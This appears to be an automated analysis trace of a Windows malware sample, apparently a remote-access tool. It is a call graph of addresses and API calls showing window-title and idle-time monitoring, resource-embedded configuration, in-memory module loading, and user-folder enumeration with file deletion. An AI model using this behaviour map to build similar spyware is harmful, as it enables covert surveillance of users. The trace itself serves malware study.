53809->53900 53813 4170cd 53810->53813 53812 415d34 53947 4050e4 84 API calls 53812->53947 53816 401fd8 11 API calls 53813->53816 53819 4170d9 53816->53819 53818 415d04 53818->53808 53821 401fd8 11 API calls 53819->53821 53820 415bde 53822 41bc1f 28 API calls 53820->53822 53823 4170e5 53821->53823 53824 415be9 53822->53824 53906 41bb27 53824->53906 53829 401e65 22 API calls 53830 415c13 53829->53830 53831 402f31 28 API calls 53830->53831 53832 415c21 53831->53832 53915 402ea1 53832->53915 53835 402f10 28 API calls 53836 415c3f 53835->53836 53837 402ea1 28 API calls 53836->53837 53838 415c4e 53837->53838 53839 402f10 28 API calls 53838->53839 53840 415c5a 53839->53840 53841 402ea1 28 API calls 53840->53841 53842 415c64 53841->53842 53843 404aa1 61 API calls 53842->53843 53844 415c73 53843->53844 53845 401fd8 11 API calls 53844->53845 53846 415c7c 53845->53846 53847 401fd8 11 API calls 53846->53847 53848 415c88 53847->53848 53849 401fd8 11 API calls 53848->53849 53850 415c94 53849->53850 53851 401fd8 11 API calls 53850->53851 53852 415ca0 53851->53852 53853 401fd8 11 API calls 53852->53853 53854 415cac 53853->53854 53855 401fd8 11 API calls 53854->53855 53856 415cb8 53855->53856 53924 401f09 53856->53924 53859 401fd8 11 API calls 53860 415cca 53859->53860 53861 401fd8 11 API calls 53860->53861 53862 415cd3 53861->53862 53863 401e65 22 API calls 53862->53863 53864 415cde 53863->53864 53927 43bb2c 53864->53927 53867 415cf0 53871 415d09 53867->53871 53872 415cfe 53867->53872 53868 415d16 53869 401e65 22 API calls 53868->53869 53870 415d20 53869->53870 53870->53808 53870->53812 53932 404f51 53871->53932 53931 404ff4 82 API calls 53872->53931 53948 40423a 53875->53948 53879 4020df 11 API calls 53878->53879 53899 41bebf 53879->53899 53880 41bf2f 53881 401fd8 11 API calls 53880->53881 53882 41bf61 53881->53882 53883 401fd8 11 API calls 53882->53883 53885 41bf69 53883->53885 53884 41bf31 53886 4041a2 28 API calls 53884->53886 53888 401fd8 11 API calls 53885->53888 53889 41bf3d 53886->53889 53887 4041a2 28 API calls 53887->53899 53890 415ba1 53888->53890 53891 401fe2 28 API calls 53889->53891 53890->53808 53890->53809 53890->53870 53893 41bf46 53891->53893 53892 401fe2 28 API calls 53892->53899 53894 401fd8 11 API calls 53893->53894 53896 41bf4e 53894->53896 53895 401fd8 11 API calls 53895->53899 53955 41cec5 28 API calls 53896->53955 53899->53880 53899->53884 53899->53887 53899->53892 53899->53895 53954 41cec5 28 API calls 53899->53954 53956 441ed1 53900->53956 53903 402093 28 API calls 53904 415bd2 53903->53904 53905 41bb77 GetLastInputInfo GetTickCount 53904->53905 53905->53820 53965 436f10 53906->53965 53911 41bdaf 53912 41bdbc 53911->53912 53913 4020b7 28 API calls 53912->53913 53914 415c05 53913->53914 53914->53829 53921 402eb0 53915->53921 53916 402ef2 53917 401fb0 28 API calls 53916->53917 53918 402ef0 53917->53918 53919 402055 11 API calls 53918->53919 53920 402f09 53919->53920 53920->53835 53921->53916 53922 402ee7 53921->53922 54014 403365 28 API calls 53922->54014 53925 402252 11 API calls 53924->53925 53926 401f12 53925->53926 53926->53859 53928 43bb45 _strftime 53927->53928 54015 43ae83 53928->54015 53930 415ceb 53930->53867 53930->53868 53931->53818 53933 404f65 53932->53933 53934 404fea 53932->53934 53935 404f6e 53933->53935 53936 404fc0 CreateEventA CreateThread 53933->53936 53937 404f7d GetLocalTime 53933->53937 53934->53808 53935->53936 53936->53934 54086 405150 53936->54086 53938 41bc1f 28 API calls 53937->53938 53939 404f91 53938->53939 54085 4052fd 28 API calls 53939->54085 53947->53818 53949 404243 53948->53949 53950 4023ce 11 API calls 53949->53950 53951 40424e 53950->53951 53952 402569 28 API calls 53951->53952 53953 4041b5 53952->53953 53953->53802 53954->53899 53955->53880 53957 441edd 53956->53957 53960 441ccd 53957->53960 53959 41bc43 53959->53903 53961 441ce4 53960->53961 53963 441d1b __cftoe 53961->53963 53964 44062d 20 API calls _free 53961->53964 53963->53959 53964->53963 53966 41bb46 GetForegroundWindow GetWindowTextW 53965->53966 53967 40417e 53966->53967 53968 404186 53967->53968 53973 402252 53968->53973 53970 404191 53977 4041bc 53970->53977 53974 40225c 53973->53974 53975 4022ac 53973->53975 53974->53975 53981 402779 11 API calls std::_Deallocate 53974->53981 53975->53970 53978 4041c8 53977->53978 53982 4041d9 53978->53982 53980 40419c 53980->53911 53981->53975 53983 4041e9 53982->53983 53984 404206 53983->53984 53985 4041ef 53983->53985 53999 4027e6 53984->53999 53989 404267 53985->53989 53988 404204 53988->53980 53990 402888 22 API calls 53989->53990 53991 40427b 53990->53991 53992 404290 53991->53992 53993 4042a5 53991->53993 54010 4042df 22 API calls 53992->54010 53994 4027e6 28 API calls 53993->53994 53998 4042a3 53994->53998 53996 404299 54011 402c48 22 API calls 53996->54011 53998->53988 54000 4027ef 53999->54000 54001 402851 54000->54001 54002 4027f9 54000->54002 54013 4028a4 22 API calls 54001->54013 54005 402802 54002->54005 54007 402815 54002->54007 54012 402aea 28 API calls __EH_prolog 54005->54012 54008 402813 54007->54008 54009 402252 11 API calls 54007->54009 54008->53988 54009->54008 54010->53996 54011->53998 54012->54008 54014->53918 54031 43ba8a 54015->54031 54017 43aed0 54037 43a837 54017->54037 54018 43ae95 54018->54017 54019 43aeaa 54018->54019 54022 43aeaf __cftoe 54018->54022 54036 44062d 20 API calls _free 54019->54036 54022->53930 54024 43aedc 54025 43af0b 54024->54025 54045 43bacf 40 API calls __Toupper 54024->54045 54026 43af77 54025->54026 54046 43ba36 20 API calls 2 library calls 54025->54046 54047 43ba36 20 API calls 2 library calls 54026->54047 54029 43b03e _strftime 54029->54022 54048 44062d 20 API calls _free 54029->54048 54032 43baa2 54031->54032 54033 43ba8f 54031->54033 54032->54018 54049 44062d 20 API calls _free 54033->54049 54035 43ba94 __cftoe 54035->54018 54036->54022 54038 43a854 54037->54038 54040 43a84a 54037->54040 54038->54040 54050 448295 GetLastError 54038->54050 54040->54024 54041 43a875 54071 4483e4 36 API calls __Tolower 54041->54071 54043 43a88e 54072 448411 36 API calls __fassign 54043->54072 54045->54024 54046->54026 54047->54029 54048->54022 54049->54035 54051 4482b7 54050->54051 54052 4482ab 54050->54052 54074 445b74 20 API calls 3 library calls 54051->54074 54073 44883c 11 API calls 2 library calls 54052->54073 54055 4482b1 54055->54051 54057 448300 SetLastError 54055->54057 54056 4482c3 54058 4482cb 54056->54058 54081 448892 11 API calls 2 library calls 54056->54081 54057->54041 54075 446802 54058->54075 54060 4482e0 54060->54058 54062 4482e7 54060->54062 54082 448107 20 API calls _free 54062->54082 54063 4482d1 54065 44830c SetLastError 54063->54065 54083 446175 36 API calls 4 library calls 54065->54083 54066 4482f2 54068 446802 _free 20 API calls 54066->54068 54070 4482f9 54068->54070 54069 448318 54070->54057 54070->54065 54071->54043 54072->54040 54073->54055 54074->54056 54076 44680d HeapFree 54075->54076 54077 446836 _free 54075->54077 54076->54077 54078 446822 54076->54078 54077->54063 54084 44062d 20 API calls _free 54078->54084 54080 446828 GetLastError 54080->54077 54081->54060 54082->54066 54083->54069 54084->54080 54089 40515c 102 API calls 54086->54089 54088 405159 54089->54088 54090->53781 54091->53786 54092->53788 54093 44839e 54101 448790 54093->54101 54096 4483b2 54098 4483ba 54099 4483c7 54098->54099 54109 4483ca 11 API calls 54098->54109 54102 44854a _free 5 API calls 54101->54102 54103 4487b7 54102->54103 54104 4487cf TlsAlloc 54103->54104 54105 4487c0 54103->54105 54104->54105 54106 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54105->54106 54107 4483a8 54106->54107 54107->54096 54108 448319 20 API calls 2 library calls 54107->54108 54108->54098 54109->54096 54110 100020db 54113 100020e7 ___DestructExceptionObject 54110->54113 54111 100020f6 54112 10002110 dllmain_raw 54112->54111 54114 1000212a 54112->54114 54113->54111 54113->54112 54116 1000210b 54113->54116 54123 10001eec 54114->54123 54116->54111 54117 10002177 54116->54117 54121 10001eec 29 API calls 54116->54121 54117->54111 54118 10001eec 29 API calls 54117->54118 54119 1000218a 54118->54119 54119->54111 54120 10002193 dllmain_raw 54119->54120 54120->54111 54122 1000216d dllmain_raw 54121->54122 54122->54117 54124 10001ef7 54123->54124 54125 10001f2a dllmain_crt_process_detach 54123->54125 54126 10001f1c dllmain_crt_process_attach 54124->54126 54127 10001efc 54124->54127 54132 10001f06 54125->54132 54126->54132 54128 10001f01 54127->54128 54129 10001f12 54127->54129 54128->54132 54133 1000240b 25 API calls 54128->54133 54134 100023ec 27 API calls 54129->54134 54132->54116 54133->54132 54134->54132 54135 434918 54136 434924 CallCatchBlock 54135->54136 54162 434627 54136->54162 54138 43492b 54140 434954 54138->54140 54468 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 54138->54468 54149 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54140->54149 54173 4442d2 54140->54173 54144 434973 CallCatchBlock 54145 4349f3 54181 434ba5 54145->54181 54149->54145 54469 443487 36 API calls 5 library calls 54149->54469 54163 434630 54162->54163 54474 434cb6 IsProcessorFeaturePresent 54163->54474 54165 43463c 54475 438fb1 54165->54475 54167 434641 54168 434645 54167->54168 54484 44415f 54167->54484 54168->54138 54171 43465c 54171->54138 54174 4442e9 54173->54174 54175 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54174->54175 54176 43496d 54175->54176 54176->54144 54177 444276 54176->54177 54178 4442a5 54177->54178 54179 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54178->54179 54180 4442ce 54179->54180 54180->54149 54182 436f10 ___scrt_fastfail 54181->54182 54183 434bb8 GetStartupInfoW 54182->54183 54184 4349f9 54183->54184 54185 444223 54184->54185 54534 44f0d9 54185->54534 54187 44422c 54189 434a02 54187->54189 54538 446895 36 API calls 54187->54538 54190 40ea00 54189->54190 54668 41cbe1 LoadLibraryA GetProcAddress 54190->54668 54192 40ea1c GetModuleFileNameW 54673 40f3fe 54192->54673 54194 40ea38 54195 4020f6 28 API calls 54194->54195 54196 40ea47 54195->54196 54197 4020f6 28 API calls 54196->54197 54198 40ea56 54197->54198 54199 41beac 28 API calls 54198->54199 54200 40ea5f 54199->54200 54688 40fb52 54200->54688 54202 40ea68 54203 401e8d 11 API calls 54202->54203 54204 40ea71 54203->54204 54205 40ea84 54204->54205 54206 40eace 54204->54206 54883 40fbee 118 API calls 54205->54883 54207 401e65 22 API calls 54206->54207 54209 40eade 54207->54209 54213 401e65 22 API calls 54209->54213 54210 40ea96 54211 401e65 22 API calls 54210->54211 54212 40eaa2 54211->54212 54884 410f72 36 API calls __EH_prolog 54212->54884 54214 40eafd 54213->54214 54215 40531e 28 API calls 54214->54215 54217 40eb0c 54215->54217 54219 406383 28 API calls 54217->54219 54218 40eab4 54885 40fb9f 78 API calls 54218->54885 54221 40eb18 54219->54221 54223 401fe2 28 API calls 54221->54223 54222 40eabd 54886 40f3eb 71 API calls 54222->54886 54225 40eb24 54223->54225 54226 401fd8 11 API calls 54225->54226 54227 40eb2d 54226->54227 54229 401fd8 11 API calls 54227->54229 54231 40eb36 54229->54231 54232 401e65 22 API calls 54231->54232 54233 40eb3f 54232->54233 54234 401fc0 28 API calls 54233->54234 54235 40eb4a 54234->54235 54236 401e65 22 API calls 54235->54236 54237 40eb63 54236->54237 54238 401e65 22 API calls 54237->54238 54239 40eb7e 54238->54239 54240 40ebe9 54239->54240 54887 406c59 54239->54887 54241 401e65 22 API calls 54240->54241 54246 40ebf6 54241->54246 54243 40ebab 54244 401fe2 28 API calls 54243->54244 54245 40ebb7 54244->54245 54248 401fd8 11 API calls 54245->54248 54247 40ec3d 54246->54247 54253 413584 3 API calls 54246->54253 54692 40d0a4 54247->54692 54250 40ebc0 54248->54250 54892 413584 RegOpenKeyExA 54250->54892 54259 40ec21 54253->54259 54257 40f38a 54985 4139e4 30 API calls 54257->54985 54259->54247 54895 4139e4 30 API calls 54259->54895 54267 40f3a0 54986 4124b0 65 API calls ___scrt_fastfail 54267->54986 54468->54138 54469->54145 54474->54165 54476 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54475->54476 54488 43a4ba 54476->54488 54479 438fc4 54479->54167 54481 438fcc 54482 438fd7 54481->54482 54502 43a4f6 DeleteCriticalSection 54481->54502 54482->54167 54530 44fbe8 54484->54530 54487 438fda 8 API calls 3 library calls 54487->54168 54489 43a4c3 54488->54489 54491 43a4ec 54489->54491 54492 438fc0 54489->54492 54503 438eff 54489->54503 54508 43a4f6 DeleteCriticalSection 54491->54508 54492->54479 54494 43a46c 54492->54494 54523 438e14 54494->54523 54496 43a481 54496->54481 54497 43a476 54497->54496 54528 438ec2 6 API calls try_get_function 54497->54528 54499 43a48f 54500 43a49c 54499->54500 54529 43a49f 6 API calls ___vcrt_FlsFree 54499->54529 54500->54481 54502->54479 54509 438cf3 54503->54509 54506 438f36 InitializeCriticalSectionAndSpinCount 54507 438f22 54506->54507 54507->54489 54508->54492 54510 438d23 54509->54510 54511 438d27 54509->54511 54510->54511 54513 438d47 54510->54513 54516 438d93 54510->54516 54511->54506 54511->54507 54513->54511 54514 438d53 GetProcAddress 54513->54514 54515 438d63 __crt_fast_encode_pointer 54514->54515 54515->54511 54517 438dbb LoadLibraryExW 54516->54517 54522 438db0 54516->54522 54518 438dd7 GetLastError 54517->54518 54519 438def 54517->54519 54518->54519 54520 438de2 LoadLibraryExW 54518->54520 54521 438e06 FreeLibrary 54519->54521 54519->54522 54520->54519 54521->54522 54522->54510 54524 438cf3 try_get_function 5 API calls 54523->54524 54525 438e2e 54524->54525 54526 438e46 TlsAlloc 54525->54526 54527 438e37 54525->54527 54527->54497 54528->54499 54529->54496 54533 44fc01 54530->54533 54531 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54532 43464e 54531->54532 54532->54171 54532->54487 54533->54531 54535 44f0eb 54534->54535 54536 44f0e2 54534->54536 54535->54187 54539 44efd8 54536->54539 54538->54187 54540 448295 pre_c_initialization 36 API calls 54539->54540 54541 44efe5 54540->54541 54559 44f0f7 54541->54559 54543 44efed 54568 44ed6c 54543->54568 54546 44f004 54546->54535 54549 44f047 54551 446802 _free 20 API calls 54549->54551 54551->54546 54553 44f042 54592 44062d 20 API calls _free 54553->54592 54555 44f08b 54555->54549 54593 44ec42 20 API calls 54555->54593 54556 44f05f 54556->54555 54557 446802 _free 20 API calls 54556->54557 54557->54555 54560 44f103 CallCatchBlock 54559->54560 54561 448295 pre_c_initialization 36 API calls 54560->54561 54566 44f10d 54561->54566 54563 44f191 CallCatchBlock 54563->54543 54566->54563 54567 446802 _free 20 API calls 54566->54567 54594 446175 36 API calls 4 library calls 54566->54594 54595 445909 EnterCriticalSection 54566->54595 54596 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 54566->54596 54567->54566 54569 43a837 __fassign 36 API calls 54568->54569 54570 44ed7e 54569->54570 54571 44ed8d GetOEMCP 54570->54571 54572 44ed9f 54570->54572 54574 44edb6 54571->54574 54573 44eda4 GetACP 54572->54573 54572->54574 54573->54574 54574->54546 54575 4461b8 54574->54575 54576 4461f6 54575->54576 54577 4461c6 __Getctype 54575->54577 54598 44062d 20 API calls _free 54576->54598 54577->54576 54578 4461e1 RtlAllocateHeap 54577->54578 54597 443001 7 API calls 2 library calls 54577->54597 54578->54577 54580 4461f4 54578->54580 54580->54549 54582 44f199 54580->54582 54583 44ed6c 38 API calls 54582->54583 54584 44f1b8 54583->54584 54587 44f209 IsValidCodePage 54584->54587 54589 44f1bf 54584->54589 54591 44f22e ___scrt_fastfail 54584->54591 54585 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54586 44f03a 54585->54586 54586->54553 54586->54556 54588 44f21b GetCPInfo 54587->54588 54587->54589 54588->54589 54588->54591 54589->54585 54599 44ee44 GetCPInfo 54591->54599 54592->54549 54593->54549 54594->54566 54595->54566 54596->54566 54597->54577 54598->54580 54600 44ef28 54599->54600 54601 44ee7e 54599->54601 54604 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54600->54604 54609 4511ac 54601->54609 54606 44efd4 54604->54606 54606->54589 54608 44aee6 _swprintf 41 API calls 54608->54600 54610 43a837 __fassign 36 API calls 54609->54610 54611 4511cc MultiByteToWideChar 54610->54611 54613 45120a 54611->54613 54621 4512a2 54611->54621 54617 4461b8 ___crtLCMapStringA 21 API calls 54613->54617 54618 45122b __alloca_probe_16 ___scrt_fastfail 54613->54618 54614 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54615 44eedf 54614->54615 54623 44aee6 54615->54623 54616 45129c 54628 435ecd 20 API calls _free 54616->54628 54617->54618 54618->54616 54620 451270 MultiByteToWideChar 54618->54620 54620->54616 54622 45128c GetStringTypeW 54620->54622 54621->54614 54622->54616 54624 43a837 __fassign 36 API calls 54623->54624 54625 44aef9 54624->54625 54629 44acc9 54625->54629 54628->54621 54630 44ace4 ___crtLCMapStringA 54629->54630 54631 44ad0a MultiByteToWideChar 54630->54631 54632 44ad34 54631->54632 54633 44aebe 54631->54633 54637 4461b8 ___crtLCMapStringA 21 API calls 54632->54637 54639 44ad55 __alloca_probe_16 54632->54639 54634 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54633->54634 54635 44aed1 54634->54635 54635->54608 54636 44ad9e MultiByteToWideChar 54638 44adb7 54636->54638 54651 44ae0a 54636->54651 54637->54639 54656 448c33 54638->54656 54639->54636 54639->54651 54643 44ade1 54646 448c33 _strftime 11 API calls 54643->54646 54643->54651 54644 44ae19 54645 4461b8 ___crtLCMapStringA 21 API calls 54644->54645 54650 44ae3a __alloca_probe_16 54644->54650 54645->54650 54646->54651 54647 44aeaf 54664 435ecd 20 API calls _free 54647->54664 54649 448c33 _strftime 11 API calls 54652 44ae8e 54649->54652 54650->54647 54650->54649 54665 435ecd 20 API calls _free 54651->54665 54652->54647 54653 44ae9d WideCharToMultiByte 54652->54653 54653->54647 54654 44aedd 54653->54654 54666 435ecd 20 API calls _free 54654->54666 54657 44854a _free 5 API calls 54656->54657 54658 448c5a 54657->54658 54661 448c63 54658->54661 54667 448cbb 10 API calls 3 library calls 54658->54667 54660 448ca3 LCMapStringW 54660->54661 54662 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54661->54662 54663 448cb5 54662->54663 54663->54643 54663->54644 54663->54651 54664->54651 54665->54633 54666->54651 54667->54660 54669 41cc20 LoadLibraryA GetProcAddress 54668->54669 54670 41cc10 GetModuleHandleA GetProcAddress 54668->54670 54671 41cc49 44 API calls 54669->54671 54672 41cc39 LoadLibraryA GetProcAddress 54669->54672 54670->54669 54671->54192 54672->54671 54987 41b539 FindResourceA 54673->54987 54676 43bda0 new 21 API calls 54677 40f428 ctype 54676->54677 54678 4020b7 28 API calls 54677->54678 54679 40f443 54678->54679 54680 401fe2 28 API calls 54679->54680 54681 40f44e 54680->54681 54682 401fd8 11 API calls 54681->54682 54683 40f457 54682->54683 54684 43bda0 new 21 API calls 54683->54684 54685 40f468 ctype 54684->54685 54990 406e13 54685->54990 54687 40f49b 54687->54194 54689 40fb5e 54688->54689 54691 40fb65 54688->54691 54993 402163 11 API calls 54689->54993 54691->54202 54994 401fab 54692->54994 54883->54210 54884->54218 54885->54222 54888 4020df 11 API calls 54887->54888 54889 406c65 54888->54889 54890 4032a0 28 API calls 54889->54890 54891 406c82 54890->54891 54891->54243 54893 40ebdf 54892->54893 54894 4135ae RegQueryValueExA RegCloseKey 54892->54894 54893->54240 54893->54257 54894->54893 54895->54247 54985->54267 54988 41b556 LoadResource LockResource SizeofResource 54987->54988 54989 40f419 54987->54989 54988->54989 54989->54676 54991 4020b7 28 API calls 54990->54991 54992 406e27 54991->54992 54992->54687 54993->54691 55355 4129da 55356 4129ec 55355->55356 55357 4041a2 28 API calls 55356->55357 55358 4129ff 55357->55358 55359 4020f6 28 API calls 55358->55359 55360 412a0e 55359->55360 55361 4020f6 28 API calls 55360->55361 55362 412a1d 55361->55362 55363 41beac 28 API calls 55362->55363 55364 412a26 55363->55364 55365 412ace 55364->55365 55366 401e65 22 API calls 55364->55366 55367 401e8d 11 API calls 55365->55367 55368 412a3d 55366->55368 55369 412ad7 55367->55369 55371 4020f6 28 API calls 55368->55371 55370 401fd8 11 API calls 55369->55370 55372 412ae0 55370->55372 55373 412a48 55371->55373 55374 401fd8 11 API calls 55372->55374 55375 401e65 22 API calls 55373->55375 55376 412ae8 55374->55376 55377 412a53 55375->55377 55378 4020f6 28 API calls 55377->55378 55379 412a5e 55378->55379 55380 401e65 22 API calls 55379->55380 55381 412a69 55380->55381 55382 4020f6 28 API calls 55381->55382 55383 412a74 55382->55383 55384 401e65 22 API calls 55383->55384 55385 412a7f 55384->55385 55386 4020f6 28 API calls 55385->55386 55387 412a8a 55386->55387 55388 401e65 22 API calls 55387->55388 55389 412a95 55388->55389 55390 4020f6 28 API calls 55389->55390 55391 412aa0 55390->55391 55392 401e65 22 API calls 55391->55392 55393 412aae 55392->55393 55394 4020f6 28 API calls 55393->55394 55395 412ab9 55394->55395 55399 412aef GetModuleFileNameW 55395->55399 55398 404e26 99 API calls 55398->55365 55400 4020df 11 API calls 55399->55400 55401 412b1a 55400->55401 55402 4020df 11 API calls 55401->55402 55403 412b26 55402->55403 55404 4020df 11 API calls 55403->55404 55427 412b32 55404->55427 55405 40da23 32 API calls 55405->55427 55406 401fd8 11 API calls 55406->55427 55407 41ba09 43 API calls 55407->55427 55408 4185a3 31 API calls 55408->55427 55409 412c58 Sleep 55409->55427 55410 40417e 28 API calls 55410->55427 55411 4042fc 84 API calls 55411->55427 55412 40431d 28 API calls 55412->55427 55413 401f09 11 API calls 55413->55427 55414 412cfa Sleep 55414->55427 55415 403014 28 API calls 55415->55427 55416 412d9c Sleep 55416->55427 55417 41c516 32 API calls 55417->55427 55418 412dff DeleteFileW 55418->55427 55419 412e36 DeleteFileW 55419->55427 55420 412e61 55422 412e72 DeleteFileW 55420->55422 55420->55427 55435 401f09 11 API calls 55420->55435 55439 412eff 55420->55439 55421 412e88 Sleep 55421->55427 55422->55427 55423 412f01 55424 401f09 11 API calls 55423->55424 55425 412f0d 55424->55425 55426 401f09 11 API calls 55425->55426 55428 412f19 55426->55428 55427->55405 55427->55406 55427->55407 55427->55408 55427->55409 55427->55410 55427->55411 55427->55412 55427->55413 55427->55414 55427->55415 55427->55416 55427->55417 55427->55418 55427->55419 55427->55420 55427->55421 55427->55423 55431 412ecd Sleep 55427->55431 55429 401f09 11 API calls 55428->55429 55430 412f25 55429->55430 55432 40b93f 28 API calls 55430->55432 55433 401f09 11 API calls 55431->55433 55434 412f38 55432->55434 55433->55420 55436 4020f6 28 API calls 55434->55436 55435->55420 55437 412f58 55436->55437 55546 413268 55437->55546 55439->55430 55441 401f09 11 API calls 55442 412f6f 55441->55442 55443 4130e3 55442->55443 55444 412f8f 55442->55444 55445 41bdaf 28 API calls 55443->55445 55446 41bdaf 28 API calls 55444->55446 55447 4130ec 55445->55447 55448 412f9b 55446->55448 55449 402f31 28 API calls 55447->55449 55450 41bc1f 28 API calls 55448->55450 55451 413123 55449->55451 55452 412fb5 55450->55452 55453 402f10 28 API calls 55451->55453 55454 402f31 28 API calls 55452->55454 55455 413132 55453->55455 55456 412fe5 55454->55456 55457 402f10 28 API calls 55455->55457 55458 402f10 28 API calls 55456->55458 55459 41313e 55457->55459 55460 412ff4 55458->55460 55461 402f10 28 API calls 55459->55461 55462 402f10 28 API calls 55460->55462 55463 41314d 55461->55463 55464 413003 55462->55464 55465 402f10 28 API calls 55463->55465 55466 402f10 28 API calls 55464->55466 55467 41315c 55465->55467 55468 413012 55466->55468 55469 402f10 28 API calls 55467->55469 55470 402f10 28 API calls 55468->55470 55472 41316b 55469->55472 55471 413021 55470->55471 55474 402f10 28 API calls 55471->55474 55473 402f10 28 API calls 55472->55473 55475 41317a 55473->55475 55476 41302d 55474->55476 55477 402ea1 28 API calls 55475->55477 55478 402f10 28 API calls 55476->55478 55479 413184 55477->55479 55480 413039 55478->55480 55481 404aa1 61 API calls 55479->55481 55482 402ea1 28 API calls 55480->55482 55483 413191 55481->55483 55484 413048 55482->55484 55485 401fd8 11 API calls 55483->55485 55486 402f10 28 API calls 55484->55486 55487 41319d 55485->55487 55488 413054 55486->55488 55489 401fd8 11 API calls 55487->55489 55490 402ea1 28 API calls 55488->55490 55491 4131a9 55489->55491 55492 41305e 55490->55492 55493 401fd8 11 API calls 55491->55493 55494 404aa1 61 API calls 55492->55494 55495 4131b5 55493->55495 55496 41306b 55494->55496 55497 401fd8 11 API calls 55495->55497 55498 401fd8 11 API calls 55496->55498 55499 4131c1 55497->55499 55500 413074 55498->55500 55501 401fd8 11 API calls 55499->55501 55502 401fd8 11 API calls 55500->55502 55504 4131ca 55501->55504 55503 41307d 55502->55503 55506 401fd8 11 API calls 55503->55506 55505 401fd8 11 API calls 55504->55505 55507 4131d3 55505->55507 55508 413086 55506->55508 55509 401fd8 11 API calls 55507->55509 55510 401fd8 11 API calls 55508->55510 55511 4130d7 55509->55511 55512 41308f 55510->55512 55514 401fd8 11 API calls 55511->55514 55513 401fd8 11 API calls 55512->55513 55515 41309b 55513->55515 55516 4131e5 55514->55516 55517 401fd8 11 API calls 55515->55517 55518 401f09 11 API calls 55516->55518 55519 4130a7 55517->55519 55520 4131f1 55518->55520 55521 401fd8 11 API calls 55519->55521 55522 401fd8 11 API calls 55520->55522 55523 4130b3 55521->55523 55524 4131fd 55522->55524 55525 401fd8 11 API calls 55523->55525 55526 401fd8 11 API calls 55524->55526 55527 4130bf 55525->55527 55528 413209 55526->55528 55529 401fd8 11 API calls 55527->55529 55530 401fd8 11 API calls 55528->55530 55531 4130cb 55529->55531 55532 413215 55530->55532 55533 401fd8 11 API calls 55531->55533 55534 401fd8 11 API calls 55532->55534 55533->55511 55535 413221 55534->55535 55536 401fd8 11 API calls 55535->55536 55537 41322d 55536->55537 55538 401fd8 11 API calls 55537->55538 55539 413239 55538->55539 55540 401fd8 11 API calls 55539->55540 55541 413245 55540->55541 55542 401fd8 11 API calls 55541->55542 55543 413251 55542->55543 55544 401fd8 11 API calls 55543->55544 55545 412abe 55544->55545 55545->55398 55547 4132a6 55546->55547 55549 413277 55546->55549 55548 4132b5 55547->55548 55558 10001c5b 55547->55558 55550 40417e 28 API calls 55548->55550 55562 411d2d 55549->55562 55551 4132c1 55550->55551 55553 401fd8 11 API calls 55551->55553 55556 412f63 55553->55556 55556->55441 55559 10001c6b ___scrt_fastfail 55558->55559 55566 100012ee 55559->55566 55561 10001c87 55561->55548 55608 411d39 55562->55608 55565 411fa2 22 API calls new 55565->55547 55567 10001324 ___scrt_fastfail 55566->55567 55568 100013b7 GetEnvironmentVariableW 55567->55568 55592 100010f1 55568->55592 55571 100010f1 51 API calls 55572 10001465 55571->55572 55573 100010f1 51 API calls 55572->55573 55574 10001479 55573->55574 55575 100010f1 51 API calls 55574->55575 55576 1000148d 55575->55576 55577 100010f1 51 API calls 55576->55577 55578 100014a1 55577->55578 55579 100010f1 51 API calls 55578->55579 55580 100014b5 lstrlenW 55579->55580 55581 100014d2 55580->55581 55582 100014d9 lstrlenW 55580->55582 55581->55561 55583 100010f1 51 API calls 55582->55583 55584 10001501 lstrlenW lstrcatW 55583->55584 55585 100010f1 51 API calls 55584->55585 55586 10001539 lstrlenW lstrcatW 55585->55586 55587 100010f1 51 API calls 55586->55587 55588 1000156b lstrlenW lstrcatW 55587->55588 55589 100010f1 51 API calls 55588->55589 55590 1000159d lstrlenW lstrcatW 55589->55590 55591 100010f1 51 API calls 55590->55591 55591->55581 55593 10001118 ___scrt_fastfail 55592->55593 55594 10001129 lstrlenW 55593->55594 55605 10002c40 55594->55605 55597 10001177 lstrlenW FindFirstFileW 55599 100011a0 55597->55599 55600 100011e1 55597->55600 55598 10001168 lstrlenW 55598->55597 55601 100011c7 FindNextFileW 55599->55601 55602 100011aa 55599->55602 55600->55571 55601->55599 55604 100011da FindClose 55601->55604 55602->55601 55607 10001000 51 API calls ___scrt_fastfail 55602->55607 55604->55600 55606 10001148 lstrcatW lstrlenW 55605->55606 55606->55597 55606->55598 55607->55602 55643 4117d7 55608->55643 55610 411d57 55611 411d6d SetLastError 55610->55611 55612 4117d7 SetLastError 55610->55612 55619 411d35 55610->55619 55611->55619 55613 411d8a 55612->55613 55613->55611 55615 411dac GetNativeSystemInfo 55613->55615 55613->55619 55616 411df2 55615->55616 55628 411dff SetLastError 55616->55628 55646 411cde VirtualAlloc 55616->55646 55619->55565 55620 411e22 55621 411e47 GetProcessHeap HeapAlloc 55620->55621 55672 411cde VirtualAlloc 55620->55672 55623 411e70 55621->55623 55624 411e5e 55621->55624 55627 4117d7 SetLastError 55623->55627 55673 411cf5 VirtualFree 55624->55673 55625 411e3a 55625->55621 55625->55628 55629 411eb9 55627->55629 55628->55619 55630 411f6b 55629->55630 55647 411cde VirtualAlloc 55629->55647 55674 4120b2 GetProcessHeap HeapFree 55630->55674 55633 411ed2 ctype 55648 4117ea 55633->55648 55635 411efe 55635->55630 55652 411b9a 55635->55652 55639 411f36 55639->55619 55639->55630 55668 1000220c 55639->55668 55640 411f5c 55640->55619 55641 411f60 SetLastError 55640->55641 55641->55630 55644 4117e6 55643->55644 55645 4117db SetLastError 55643->55645 55644->55610 55645->55610 55646->55620 55647->55633 55649 4118c0 55648->55649 55651 411816 ctype ___scrt_fastfail 